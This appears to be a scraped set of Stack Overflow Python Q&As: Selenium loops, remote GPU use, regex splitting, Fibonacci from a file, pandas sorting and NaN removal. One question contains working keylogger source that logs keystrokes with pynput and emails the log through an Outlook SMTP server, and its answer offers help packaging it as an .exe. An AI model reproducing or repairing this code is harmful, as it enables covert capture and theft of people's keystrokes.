[ "I've done a similar task. You may try this:\nwhile True:\n try:\n btnOptions = driver.find_element(By.XPATH, \"/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div\")\n btnOptions.click()\n time.sleep(1)\n pyautogui.press(\"down\", presses=10)\n pyautogui.press(\"enter\")\n time.sleep(1)\n btn_move = driver.find_element(By.XPATH, \"/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]\")\n btn_move.click()\n except NoSuchElementException:\n break\n\n" ]
[ 0 ]
[]
[]
[ "loops", "python" ]
stackoverflow_0074575175_loops_python.txt
Q: Is there a way to use another computer GPU in vscode notebook? I have laptop A with Nvidia 2060 and desktop B with Nvidia 3080 in my room. All settings, files, and notebooks are in laptop A. Laptop A and Desktop B are on the same network (with a network hub). Is it possible to run notebooks (that contains tensorflow neural network parts) on desktop B GPU while working from laptop A ? I have seen people using juypter, docker and else to use Remote GPU, but is there a way to do it from Vscode so other students that are not familiar with this can reproduce it easily ? Thank you very much A: I am not sure, if you get it running but try this: https://code.visualstudio.com/docs/remote/vscode-server
Is there a way to use another computer GPU in vscode notebook?
I have laptop A with Nvidia 2060 and desktop B with Nvidia 3080 in my room. All settings, files, and notebooks are in laptop A. Laptop A and Desktop B are on the same network (with a network hub). Is it possible to run notebooks (that contains tensorflow neural network parts) on desktop B GPU while working from laptop A ? I have seen people using juypter, docker and else to use Remote GPU, but is there a way to do it from Vscode so other students that are not familiar with this can reproduce it easily ? Thank you very much
[ "I am not sure, if you get it running but try this:\nhttps://code.visualstudio.com/docs/remote/vscode-server\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074576049_python.txt
Q: Python split by dot and question mark, and keep the character I have a function: with open(filename,'r') as text: data=text.readlines() split=str(data).split('([.|?])') for line in split: print(line) This prints the sentences that we have after splitting a text by 2 different marks. I also want to show the split symbol in the output, this is why I use () but the split do not work fine. It returns: ['Chapter 16. My new goal. \n','Chapter 17. My new goal 2. \n'] As you can see the split haven't splitted by all dots. A: Try escaping the marks, as both symbols have functional meanings in RegEx. Also I'm quite not sure if the str.split method takes regex. maybe try it with split from Python's "re" module. [\.|\?] A: There are a few distinct problems, here. 1. read vs readlines data = text.readlines() This produces a list of str, good. ... str(data) ... If you print this, you will see it contains several characters you likely did not want: [, ', ,, ]. You'd be better off with just data = text.read(). 2. split on str vs regex str(data).split('([.|?])') We are splitting on a string, ok. Let's consult the fine documents. Return a list of the words in the string, using sep as the delimiter string. Notice there's no mention of a regular expression. That argument does not appear as sequence of seven characters in the source string. You were looking for a similar function: https://docs.python.org/3/library/re.html#re.split 3. char class vs alternation We can certainly use | vertical bar for alternation, e.g. r"(cat|dog)". It works for shorter strings, too, such as r"(c|d)". But for single characters, a character class is more convenient: r"[cd]". It is possible to match three characters, one of them being vertical bar, with r"[c|d]" or equivalently r"[cd|]". A character class can even have just a single character, so r"[c]" is identical to r"c". 4. escaping Since r".*" matches whole string, there are certainly cases where escaping dot is important, e.g. r"(cat|dog|\.)". We can construct a character class with escaping: r"[cd\.]". Within [ ] square brackets that \ backwhack is optional. Better to simply say r"[cd.]", which means the same thing. pattern = re.compile(r"[.?]") 5. findall vs split The two functions are fairly similar. But findall() is about retrieving matching elements, which your "preserve the final punctuation" requirement asks for, while split() pretty much assumes that the separator is uninteresting. So findall() seems a better match for your use case. pattern = re.compile(r"[^.?]+[.?]") Note that ^ caret usually means "anchor to start of string", but within a character class it is negation. So e.g. r"[^0-9]" means "non-digit". data = text.readlines() split = str(data).split('([.|?])') Putting it all together, try this: data = text.read() pattern = re.compile(r"[^.?]+[.?]") sentences = pattern.findall(data) If there's no trailing punctuation in the source string, the final words won't appear in the result. Consider tacking on a "." period in that case.
Python split by dot and question mark, and keep the character
I have a function: with open(filename,'r') as text: data=text.readlines() split=str(data).split('([.|?])') for line in split: print(line) This prints the sentences that we have after splitting a text by 2 different marks. I also want to show the split symbol in the output, this is why I use () but the split do not work fine. It returns: ['Chapter 16. My new goal. \n','Chapter 17. My new goal 2. \n'] As you can see the split haven't splitted by all dots.
[ "Try escaping the marks, as both symbols have functional meanings in RegEx. Also I'm quite not sure if the str.split method takes regex. maybe try it with split from Python's \"re\" module.\n[\\.|\\?]\n\n", "There are a few distinct problems, here.\n1. read vs readlines\n\n data = text.readlines()\n\n\nThis produces a list of str, good.\n\n... str(data) ...\n\n\nIf you print this, you will see it contains\nseveral characters you likely did not want: [, ', ,, ].\nYou'd be better off with just data = text.read().\n2. split on str vs regex\n\nstr(data).split('([.|?])')\n\n\nWe are splitting on a string, ok.\nLet's consult the fine documents.\n\nReturn a list of the words in the string, using sep as the delimiter string.\n\nNotice there's no mention of a regular expression.\nThat argument does not appear as sequence of seven characters in the source string.\nYou were looking for a similar function:\nhttps://docs.python.org/3/library/re.html#re.split\n3. char class vs alternation\nWe can certainly use | vertical bar for alternation,\ne.g. r\"(cat|dog)\".\nIt works for shorter strings, too, such as r\"(c|d)\".\nBut for single characters, a character class is\nmore convenient: r\"[cd]\".\nIt is possible to match three characters,\none of them being vertical bar, with r\"[c|d]\"\nor equivalently r\"[cd|]\".\nA character class can even have just a single character,\nso r\"[c]\" is identical to r\"c\".\n4. escaping\nSince r\".*\" matches whole string,\nthere are certainly cases where escaping dot is important,\ne.g. r\"(cat|dog|\\.)\".\nWe can construct a character class with escaping:\nr\"[cd\\.]\".\nWithin [ ] square brackets that \\ backwhack is optional.\nBetter to simply say r\"[cd.]\", which means the same thing.\n pattern = re.compile(r\"[.?]\")\n\n5. findall vs split\nThe two functions are fairly similar.\nBut findall() is about retrieving matching elements,\nwhich your \"preserve the final punctuation\"\nrequirement asks for,\nwhile split() pretty much assumes\nthat the separator is uninteresting.\nSo findall() seems a better match for your use case.\n pattern = re.compile(r\"[^.?]+[.?]\")\n\nNote that ^ caret usually means \"anchor\nto start of string\", but within a character class\nit is negation.\nSo e.g. r\"[^0-9]\" means \"non-digit\".\n\n\n data = text.readlines()\n split = str(data).split('([.|?])')\n\n\nPutting it all together, try this:\n data = text.read()\n pattern = re.compile(r\"[^.?]+[.?]\")\n sentences = pattern.findall(data)\n\n\nIf there's no trailing punctuation in the source string,\nthe final words won't appear in the result.\nConsider tacking on a \".\" period in that case.\n" ]
[ 0, 0 ]
[]
[]
[ "python", "split" ]
stackoverflow_0074575458_python_split.txt
Q: With Python, I want to add the last two values of a string but I want to keep double digit numbers together and not include spaces in the string index I need to create a fibonacci sequence (k = 5, until 5 elements are in the sequence) from an original string containing two starting values. While calling the last two elements in the string forward (newnumber= old[-1] + old[-2]) I pull the number "5" and what seems to be a "black space". Is there a way to lift the integers in the original sequence above the type of black spaces to make it easier to manipulate the useful data I need? Below is my code for reference. ORIGINAL STRING IN FIRST FILE: 31 5 with open("C:\\Users\\dylan\\Downloads\\rosalind_fib.txt", "r") as old: old = old.read() ## An attempt to make the numbers the only elemenet, this did not work --> old = list(old) new = open("C:\\Users\\dylan\\Downloads\\new.txt", "w") ## to test the values for each index --> print(old[###]) while len(old) < 6: newnumber= old[-1] + old[-2] old += newnumber if len(old) == 6: break new.write(old) new.close() print(new) The desired output is: 31 5 36 41 77 A sequence of 5 numbers where the sum of the last two numbers in the sequence is the new number added to the end of sequence. A: Use split() to split the string on whitespace. When you write it back out you can use join() to turn the list of numbers back into a string. with open('old.txt') as f: nums = [int(n) for n in f.read().strip().split()] while len(nums) < 5: nums.append(nums[-2] + nums[-1]) with open('new.txt', 'w') as f: f.write(' '.join(str(n) for n in nums)) Result: >echo 31 5 > old.txt >cat old.txt 31 5 >python test.py >cat new.txt 31 5 36 41 77 Breaking down how we read the file a bit: the first thing we do is read() the file, giving us a string: >>> with open ("old.txt") as f: ... contents = f.read() ... >>> contents '31 5 \n' We want to strip the contents to get rid of the trailing whitespace (otherwise when we split later we'll have an empty string at the end): >>> contents.strip() '31 5' and then we split() that to produce a list: >>> contents.strip().split() ['31', '5'] and we can iterate over that in a list comprehension to get a list of ints: >>> [int(n) for n in contents.strip().split()] [31, 5]
With Python, I want to add the last two values of a string but I want to keep double digit numbers together and not include spaces in the string index
I need to create a fibonacci sequence (k = 5, until 5 elements are in the sequence) from an original string containing two starting values. While calling the last two elements in the string forward (newnumber= old[-1] + old[-2]) I pull the number "5" and what seems to be a "black space". Is there a way to lift the integers in the original sequence above the type of black spaces to make it easier to manipulate the useful data I need? Below is my code for reference. ORIGINAL STRING IN FIRST FILE: 31 5 with open("C:\\Users\\dylan\\Downloads\\rosalind_fib.txt", "r") as old: old = old.read() ## An attempt to make the numbers the only elemenet, this did not work --> old = list(old) new = open("C:\\Users\\dylan\\Downloads\\new.txt", "w") ## to test the values for each index --> print(old[###]) while len(old) < 6: newnumber= old[-1] + old[-2] old += newnumber if len(old) == 6: break new.write(old) new.close() print(new) The desired output is: 31 5 36 41 77 A sequence of 5 numbers where the sum of the last two numbers in the sequence is the new number added to the end of sequence.
[ "Use split() to split the string on whitespace. When you write it back out you can use join() to turn the list of numbers back into a string.\nwith open('old.txt') as f:\n nums = [int(n) for n in f.read().strip().split()]\n\nwhile len(nums) < 5:\n nums.append(nums[-2] + nums[-1])\n\nwith open('new.txt', 'w') as f:\n f.write(' '.join(str(n) for n in nums))\n\nResult:\n>echo 31 5 > old.txt\n\n>cat old.txt\n31 5\n\n>python test.py\n\n>cat new.txt\n31 5 36 41 77\n\nBreaking down how we read the file a bit: the first thing we do is read() the file, giving us a string:\n>>> with open (\"old.txt\") as f:\n... contents = f.read()\n...\n>>> contents\n'31 5 \\n'\n\nWe want to strip the contents to get rid of the trailing whitespace (otherwise when we split later we'll have an empty string at the end):\n>>> contents.strip()\n'31 5'\n\nand then we split() that to produce a list:\n>>> contents.strip().split()\n['31', '5']\n\nand we can iterate over that in a list comprehension to get a list of ints:\n>>> [int(n) for n in contents.strip().split()]\n[31, 5]\n\n" ]
[ 0 ]
[]
[]
[ "fibonacci", "python", "rosalind" ]
stackoverflow_0074576106_fibonacci_python_rosalind.txt
Q: Python .exe keylogger file not sending email I created a keylogger which captures keystrokes and sends the keystrokes file to an email address specified. The python script when run from VS code terminal works perfectly, but when I compiled the files into an executable(.exe) using nuitka and execute the .exe file by double-clicking on the .exe file, the keylogger captures the keystrokes but does not send the email. What can I do to fix this? from pynput.keyboard import Listener, Key from decrypt import decrypt from encrypt import encrypt from sendoulook import send_mail decrypt() count = 0 def on_press(key): global count letter = str(key) letter = letter.replace("'","") special_keys(letter) count += 1 if count == 10000000: return False def special_keys(letter): if letter == "Key.space": letter = " " if letter == "Key.enter": letter = "\n" if letter.find("Key") == -1: with open("log.txt","a") as f: f.write(letter) def on_release(key): if key == Key.esc: f = open("log.txt","a") f.write("\n") return False with Listener(on_press=on_press, on_release=on_release) as l: l.join() encrypt() try: if __name__ == "__main__": send_mail() except Exception as error: print(error) THIS IS THE CODE FOR THE sendmail() function import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.base import MIMEBase from email import encoders from decouple import config from retry import retry @retry((Exception), tries=3, delay=2,backoff=2) def send_mail(): if __name__ == "sendoutlook": fromaddr = "example@outlook.com" toaddr = "example@gmail.com" password = config("PASS") msg = MIMEMultipart() msg["From"] = fromaddr msg["To"] = toaddr msg["Subject"] = "Keylog Strokes" body = "This file contains the recorded keystrokes." msg.attach(MIMEText(body,"plain")) filename = "log.txt" attachment = open("log.txt","rb") p = MIMEBase("application","octet-stream") p.set_payload((attachment).read()) encoders.encode_base64(p) p.add_header("Content-Disposition","attachment;filename=%s"%filename) msg.attach(p) s = smtplib.SMTP("smtp.office365.com",587) s.starttls() s.login(fromaddr,password) text = msg.as_string() s.sendmail(fromaddr,toaddr,text) s.quit **nuitka command ** python -m nuitka --mingw64 <main.py> --standalone --onefile A: So, nuitka doesn't compile python scripts effectively, thus not allowing the .exe file to send the email specified in your code. I suggest you try pyinstaller and see if that works.
Python .exe keylogger file not sending email
I created a keylogger which captures keystrokes and sends the keystrokes file to an email address specified. The python script when run from VS code terminal works perfectly, but when I compiled the files into an executable(.exe) using nuitka and execute the .exe file by double-clicking on the .exe file, the keylogger captures the keystrokes but does not send the email. What can I do to fix this? from pynput.keyboard import Listener, Key from decrypt import decrypt from encrypt import encrypt from sendoulook import send_mail decrypt() count = 0 def on_press(key): global count letter = str(key) letter = letter.replace("'","") special_keys(letter) count += 1 if count == 10000000: return False def special_keys(letter): if letter == "Key.space": letter = " " if letter == "Key.enter": letter = "\n" if letter.find("Key") == -1: with open("log.txt","a") as f: f.write(letter) def on_release(key): if key == Key.esc: f = open("log.txt","a") f.write("\n") return False with Listener(on_press=on_press, on_release=on_release) as l: l.join() encrypt() try: if __name__ == "__main__": send_mail() except Exception as error: print(error) THIS IS THE CODE FOR THE sendmail() function import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.base import MIMEBase from email import encoders from decouple import config from retry import retry @retry((Exception), tries=3, delay=2,backoff=2) def send_mail(): if __name__ == "sendoutlook": fromaddr = "example@outlook.com" toaddr = "example@gmail.com" password = config("PASS") msg = MIMEMultipart() msg["From"] = fromaddr msg["To"] = toaddr msg["Subject"] = "Keylog Strokes" body = "This file contains the recorded keystrokes." msg.attach(MIMEText(body,"plain")) filename = "log.txt" attachment = open("log.txt","rb") p = MIMEBase("application","octet-stream") p.set_payload((attachment).read()) encoders.encode_base64(p) p.add_header("Content-Disposition","attachment;filename=%s"%filename) msg.attach(p) s = smtplib.SMTP("smtp.office365.com",587) s.starttls() s.login(fromaddr,password) text = msg.as_string() s.sendmail(fromaddr,toaddr,text) s.quit **nuitka command ** python -m nuitka --mingw64 <main.py> --standalone --onefile
[ "So, nuitka doesn't compile python scripts effectively, thus not allowing the .exe file to send the email specified in your code. I suggest you try pyinstaller and see if that works.\n" ]
[ 0 ]
[]
[]
[ "executable", "keylogger", "nuitka", "python", "security" ]
stackoverflow_0074556880_executable_keylogger_nuitka_python_security.txt
Q: How can I drop nan(s)? Unique values of the column as follows: array(['..', '0', nan, ..., '30.0378539547197', '73.3261637778593', '59.9402466154723'], dtype=object) I use the following codes to drop NaNs and None. df[df["Country Name"].isin([None]) == False] and it still includes the NaNs. A: You can use .isna to check for nan. df[~df["Country Name"].isna()] A: Did you try this df = df.dropna() ? A: You can probably use "dropna" method if the NaN's are in a correct format. And if you want to do it for a particular column then, use df["column_name"].dropna() or df.dropna(subset=['column_name1', 'column_name2']) I hope this helps!!!
How can I drop nan(s)?
Unique values of the column as follows: array(['..', '0', nan, ..., '30.0378539547197', '73.3261637778593', '59.9402466154723'], dtype=object) I use the following codes to drop NaNs and None. df[df["Country Name"].isin([None]) == False] and it still includes the NaNs.
[ "You can use .isna to check for nan.\ndf[~df[\"Country Name\"].isna()]\n\n", "Did you try this df = df.dropna() ?\n", "You can probably use \"dropna\" method if the NaN's are in a correct format.\nAnd if you want to do it for a particular column then, use\ndf[\"column_name\"].dropna()\nor\ndf.dropna(subset=['column_name1', 'column_name2'])\nI hope this helps!!!\n" ]
[ 0, 0, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575387_pandas_python.txt
Q: how to enter the user's reply message on the bot and put it in a variable so the problem here is I want to enter data into the database via a bot, and I'm trying to retrieve word for word with arrays or indexing, but what if the user wants to enter data into the name column and has a varied name which can consist of 4-3 sentences, so do you guys have a solution My Code I'm confused, I hope someone can help me A: You can assume that class and status are always a single word so take texts[-1] as status, texts[-2] as class and texts[:-2] as the name. This way if it is a name with 3-4 words then all of it will be accounted for.
how to enter the user's reply message on the bot and put it in a variable
so the problem here is I want to enter data into the database via a bot, and I'm trying to retrieve word for word with arrays or indexing, but what if the user wants to enter data into the name column and has a varied name which can consist of 4-3 sentences, so do you guys have a solution My Code I'm confused, I hope someone can help me
[ "You can assume that class and status are always a single word so take texts[-1] as status, texts[-2] as class and texts[:-2] as the name. This way if it is a name with 3-4 words then all of it will be accounted for.\n" ]
[ 0 ]
[]
[]
[ "bots", "py_telegram_bot_api", "python", "variables" ]
stackoverflow_0074576164_bots_py_telegram_bot_api_python_variables.txt
Q: Having an error message when trying to sort a dataset in customized list I'm using python to organize an imported csv file. the dataset I have looks like this Name Style ID 0 heels High end 1 1 sneaker Middle 0 2 top High end 3 3 skirt Low end 6 4 dress High end 4 5 sweater Low end 9 6 hat N/A. 2 .. I am trying to arrange it so that I have have the dataset sorted like this where High end, Middle and Low are all arranged first, and other styles follow Name Style ID 0 heels High end 1 1 sneaker High end 3 2 top High end 4 3 skirt Middle 0 4 dress Low end 6 5 sweater Low end 9 6 hat N/A. 2 ... I tried this code 1 sort_order = {'High End':0, 2 'Middle':1, 'Low end':2,} 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) I get an error ---> 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) TypeError: list indices must be integers or slices, not str I've also tried: 1 sortlist = ['High End':0, 2 'Middle':1, 'Low end':2,] 3 sorted(Clothing_Df['Style'], key= sortlist) returns the same Typeerror I am not sure how to best tackle this problem as it is a very large dataset and I simply need to figure out how to custom sort my data. Any help needed thank you A: use pd.Categorical to specify the order. style_list = df['Style'].unique() sort_order = sorted(style_list, key=lambda x: (x == 'High end', x == 'Middle', x == 'Low end'), reverse=True) df['Style'] = pd.Categorical(df['Style'], categories=sort_order, ordered=True) df.sort_values('Style', inplace=True) output: > df Name Style ID 0 heels High end 1 2 top High end 3 4 dress High end 4 1 sneaker Middle 0 3 skirt Low end 6 5 sweater Low end 9 6 hat N/A. 2 7 jacket Other 10
Having an error message when trying to sort a dataset in customized list
I'm using python to organize an imported csv file. the dataset I have looks like this Name Style ID 0 heels High end 1 1 sneaker Middle 0 2 top High end 3 3 skirt Low end 6 4 dress High end 4 5 sweater Low end 9 6 hat N/A. 2 .. I am trying to arrange it so that I have have the dataset sorted like this where High end, Middle and Low are all arranged first, and other styles follow Name Style ID 0 heels High end 1 1 sneaker High end 3 2 top High end 4 3 skirt Middle 0 4 dress Low end 6 5 sweater Low end 9 6 hat N/A. 2 ... I tried this code 1 sort_order = {'High End':0, 2 'Middle':1, 'Low end':2,} 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) I get an error ---> 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) TypeError: list indices must be integers or slices, not str I've also tried: 1 sortlist = ['High End':0, 2 'Middle':1, 'Low end':2,] 3 sorted(Clothing_Df['Style'], key= sortlist) returns the same Typeerror I am not sure how to best tackle this problem as it is a very large dataset and I simply need to figure out how to custom sort my data. Any help needed thank you
[ "use pd.Categorical to specify the order.\nstyle_list = df['Style'].unique()\nsort_order = sorted(style_list, key=lambda x: (x == 'High end', x == 'Middle', x == 'Low end'), reverse=True)\ndf['Style'] = pd.Categorical(df['Style'], categories=sort_order, ordered=True)\ndf.sort_values('Style', inplace=True)\n\noutput:\n> df\n\n Name Style ID\n0 heels High end 1\n2 top High end 3\n4 dress High end 4\n1 sneaker Middle 0\n3 skirt Low end 6\n5 sweater Low end 9\n6 hat N/A. 2\n7 jacket Other 10\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python", "sorting" ]
stackoverflow_0074576076_dataframe_pandas_python_sorting.txt
Q: use of < var < in embedded if statements I'm learning Python via Udemy and we did a coding project where you have to get a user's height and weight, calculate their BMI and print the result. In my code, for the embedded if (elif) statements, I did something like this (variable is bmi to hold the actual BMI calculation): elif 18.5 < bmi < 25 if bmi < 18.5: print(f"Your BMI is {bmi}, you are slightly underweight.") elif 18.5 < bmi < 25: print(f"Your BMI is {bmi}, you have a normal weight.") elif 25 < bmi < 30: print(f"Your BMI is {bmi}, you are slightly overweight.") Now, the instructor instead did this: elif bmi < 25. She didn't use the format < var < like I did. Now my code worked just fine from what I can tell but it was implied that there could be a potential issue using my format. Can anyone confirm/deny that my format could cause a problem under the right circumstances??? I just want to make sure I'm coding correctly. A: now, the instructor instead did this: elif bmi < 25 This is better for two reasons: You already know bmi >= 18.5 because if it were lower you would have entered the first if clause and not reached this elif test. So it's a waste of effort to test again whether for bmi > 18.5 If bmi is exactly equal to 18.5, none of your tests will match and your code will probably do something unexpected. You should be testing for bmi >= 18.5 (which again is redundant because of point 1), or including an elif clause specifically to check bmi == 18.5 if that case needs special handling.
use of < var < in embedded if statements
I'm learning Python via Udemy and we did a coding project where you have to get a user's height and weight, calculate their BMI and print the result. In my code, for the embedded if (elif) statements, I did something like this (variable is bmi to hold the actual BMI calculation): elif 18.5 < bmi < 25 if bmi < 18.5: print(f"Your BMI is {bmi}, you are slightly underweight.") elif 18.5 < bmi < 25: print(f"Your BMI is {bmi}, you have a normal weight.") elif 25 < bmi < 30: print(f"Your BMI is {bmi}, you are slightly overweight.") Now, the instructor instead did this: elif bmi < 25. She didn't use the format < var < like I did. Now my code worked just fine from what I can tell but it was implied that there could be a potential issue using my format. Can anyone confirm/deny that my format could cause a problem under the right circumstances??? I just want to make sure I'm coding correctly.
[ "\nnow, the instructor instead did this: elif bmi < 25\n\nThis is better for two reasons:\n\nYou already know bmi >= 18.5 because if it were lower you would have entered the first if clause and not reached this elif test. So it's a waste of effort to test again whether for bmi > 18.5\n\nIf bmi is exactly equal to 18.5, none of your tests will match and your code will probably do something unexpected. You should be testing for bmi >= 18.5 (which again is redundant because of point 1), or including an elif clause specifically to check bmi == 18.5 if that case needs special handling.\n\n\n" ]
[ 4 ]
[ "x < bmi < y is perfectly fine Python code. Python will interpret it as x < bmi and bmi < y:\nhttps://www.geeksforgeeks.org/chaining-comparison-operators-python/\nHowever, as @The Photon said, your code will have a bug if you input bmi = 18.5 or 25.\nSince if, elif, ... statements are evaluated in sequence, it's better to avoid introducing bugs, and work as your intructor did (if bmi < 25, etc.), because you already know that this line of code will only execute after the previous if/elif expressions failed (like if bmi < 18.5).\n" ]
[ -1 ]
[ "python" ]
stackoverflow_0074576190_python.txt
Q: Kubectl logs does not return any output I am trying to debug my application and I need to look the logs for my backend service. I run it with conda run and the configuration is the following: # Partir de l’image officielle de Python 3.7 FROM continuumio/miniconda3 EXPOSE 50051 # Mettre le code de l’application dans le répertoire / de l’image WORKDIR / # Copier les librairie nécessaire à votre application ADD prod-env.yml / # Installer les packages Python nécessaires dans requirements.txt RUN conda env create -f prod-env.yml --prefix ./env # Copier le code de l’application dans le répertoire / ADD src /src ENV PYTHONUNBUFFERED=1 # Lancer le script app.py quand le container démarre CMD ["conda","run", "--no-capture-output", "-v", "-v" ,"-p", "./env", "python", "-u", "-m", "src.main"] I know the kubernetes deployment is successful since I am able to send some requests and get responses, but I am trying to debug an edge case and I need the logs. The command kubectl logs backend-xxxxxxxx does not return anything. What is weird is when I try to run the container directly, I get the expected output docker run --platform linux/amd64 865959cfcf1c DEBUG conda.gateways.logging:set_verbosity(246): verbosity set to 2 DEBUG conda.gateways.subprocess:subprocess_call(85): executing>> /bin/bash /tmp/tmpxsyy9ay5 WARNING: overwriting environment variables set in the machine overwriting variable PYTHONUNBUFFERED Server started, listening on 50051 How can I get the output when the container is deployed on kubernetes ? A: I made it work by specifying to use stdout instead of stderr in the logging config. It is weird though since the doc specifies that both stderr and stdout should be logged.
Kubectl logs does not return any output
I am trying to debug my application and I need to look the logs for my backend service. I run it with conda run and the configuration is the following: # Partir de l’image officielle de Python 3.7 FROM continuumio/miniconda3 EXPOSE 50051 # Mettre le code de l’application dans le répertoire / de l’image WORKDIR / # Copier les librairie nécessaire à votre application ADD prod-env.yml / # Installer les packages Python nécessaires dans requirements.txt RUN conda env create -f prod-env.yml --prefix ./env # Copier le code de l’application dans le répertoire / ADD src /src ENV PYTHONUNBUFFERED=1 # Lancer le script app.py quand le container démarre CMD ["conda","run", "--no-capture-output", "-v", "-v" ,"-p", "./env", "python", "-u", "-m", "src.main"] I know the kubernetes deployment is successful since I am able to send some requests and get responses, but I am trying to debug an edge case and I need the logs. The command kubectl logs backend-xxxxxxxx does not return anything. What is weird is when I try to run the container directly, I get the expected output docker run --platform linux/amd64 865959cfcf1c DEBUG conda.gateways.logging:set_verbosity(246): verbosity set to 2 DEBUG conda.gateways.subprocess:subprocess_call(85): executing>> /bin/bash /tmp/tmpxsyy9ay5 WARNING: overwriting environment variables set in the machine overwriting variable PYTHONUNBUFFERED Server started, listening on 50051 How can I get the output when the container is deployed on kubernetes ?
[ "I made it work by specifying to use stdout instead of stderr in the logging config. It is weird though since the doc specifies that both stderr and stdout should be logged.\n" ]
[ 0 ]
[]
[]
[ "kubernetes", "logging", "python" ]
stackoverflow_0074564853_kubernetes_logging_python.txt
Q: Turning keywords into lists in python dataframe columns I've extracted key words from a different column to make a new column (hard skills) that looks like this: (https://i.stack.imgur.com/XNOIK.png) But I want to make each key word into a list format within the "hards skills" column. For example, for the 1st row of "hard skills" column, my desired outcome would be: ['Python Programming', 'Machine Learning', 'Data Analysis'...] instead of Python Programming,Machine Learning,Data Analysis... This is how I filtered the key words out into the new "hard skills" column. #Filter and make new column for hard skills hard_skills = ['Python Programming', 'Statistics', 'Statistical Hypothesis Testing','Data Cleansing', 'Tensorflow', 'Machine Learning', 'Data Analysis','Data Visualization', 'Cloud Computing', 'R Programming', 'Data Science','Computer Programming', 'Deep Learning', 'Data Analysis', 'SQL', 'Regression Analysis', 'Algorithms', 'JavaScript', 'Python'] def get_hard_skills(skills): return_hard_skills = "" for hard_skill in hard_skills: if skills.find(hard_skill) >= 0: if return_hard_skills == "": return_hard_skills = hard_skill else: return_hard_skills = return_hard_skills + "," + hard_skill if return_hard_skills == "": return ('not found') else: return return_hard_skills course_name_skills['hard skills'] = "" #loop through data frame to get hard skills for i in range(0,len(course_name_skills)-1): #every single line of the data science courses skills = course_name_skills.loc[i,"skills"] if not isNaN(skills): #if not empty course_name_skills.loc[i,"hard skills"] = get_hard_skills(skills) course_name_skills = course_name_skills.replace('not found',np.NaN) only_hardskills = course_name_skills.dropna(subset=['hard skills']) Is there a way I could change the code that filtered the data frame for key words? Or is there a more efficient way? I tried strip.() or even tried my luck with return_hard_skills = "[" + return_hard_skills + "," + hard_skill + "]" But it didn't come through. [Dataframe with original column] random, but needed, true or false table generated A: IIUC, there is no need for functions and/or loops here since you can use pandas.Series.str.join to get your expected column/output : course_name_skills["hard skills"]= course_name_skills["skills"].str.join(",") NB: The line above assumes that the column hard skills holds lists, otherwise (if strings) use this : course_name_skills["hard skills"]= ( course_name_skills["skills"] .str.strip("[]") .replace({"'": "", "\s+": ""}, regex=True) ) A: df['skills'] = df['hard skills'].str.split(',').apply( lambda skills: [skill.strip() for skill in skills] ) And if you want to add filtering: skills = list(set(df['skills'].sum())) for skill in skills: df[skill] = df['skills'].apply(lambda x: skill in x) df.loc[df['Data Analysis']==True]['course_name']
Turning keywords into lists in python dataframe columns
I've extracted key words from a different column to make a new column (hard skills) that looks like this: (https://i.stack.imgur.com/XNOIK.png) But I want to make each key word into a list format within the "hards skills" column. For example, for the 1st row of "hard skills" column, my desired outcome would be: ['Python Programming', 'Machine Learning', 'Data Analysis'...] instead of Python Programming,Machine Learning,Data Analysis... This is how I filtered the key words out into the new "hard skills" column. #Filter and make new column for hard skills hard_skills = ['Python Programming', 'Statistics', 'Statistical Hypothesis Testing','Data Cleansing', 'Tensorflow', 'Machine Learning', 'Data Analysis','Data Visualization', 'Cloud Computing', 'R Programming', 'Data Science','Computer Programming', 'Deep Learning', 'Data Analysis', 'SQL', 'Regression Analysis', 'Algorithms', 'JavaScript', 'Python'] def get_hard_skills(skills): return_hard_skills = "" for hard_skill in hard_skills: if skills.find(hard_skill) >= 0: if return_hard_skills == "": return_hard_skills = hard_skill else: return_hard_skills = return_hard_skills + "," + hard_skill if return_hard_skills == "": return ('not found') else: return return_hard_skills course_name_skills['hard skills'] = "" #loop through data frame to get hard skills for i in range(0,len(course_name_skills)-1): #every single line of the data science courses skills = course_name_skills.loc[i,"skills"] if not isNaN(skills): #if not empty course_name_skills.loc[i,"hard skills"] = get_hard_skills(skills) course_name_skills = course_name_skills.replace('not found',np.NaN) only_hardskills = course_name_skills.dropna(subset=['hard skills']) Is there a way I could change the code that filtered the data frame for key words? Or is there a more efficient way? I tried strip.() or even tried my luck with return_hard_skills = "[" + return_hard_skills + "," + hard_skill + "]" But it didn't come through. [Dataframe with original column] random, but needed, true or false table generated
[ "IIUC, there is no need for functions and/or loops here since you can use pandas.Series.str.join to get your expected column/output :\ncourse_name_skills[\"hard skills\"]= course_name_skills[\"skills\"].str.join(\",\")\n\nNB: The line above assumes that the column hard skills holds lists, otherwise (if strings) use this :\ncourse_name_skills[\"hard skills\"]= (\n course_name_skills[\"skills\"]\n .str.strip(\"[]\")\n .replace({\"'\": \"\", \"\\s+\": \"\"}, regex=True)\n )\n\n", "df['skills'] = df['hard skills'].str.split(',').apply(\n lambda skills: [skill.strip() for skill in skills]\n)\n\nAnd if you want to add filtering:\nskills = list(set(df['skills'].sum()))\nfor skill in skills:\n df[skill] = df['skills'].apply(lambda x: skill in x)\n\ndf.loc[df['Data Analysis']==True]['course_name']\n\n" ]
[ 0, 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074576129_dataframe_pandas_python.txt
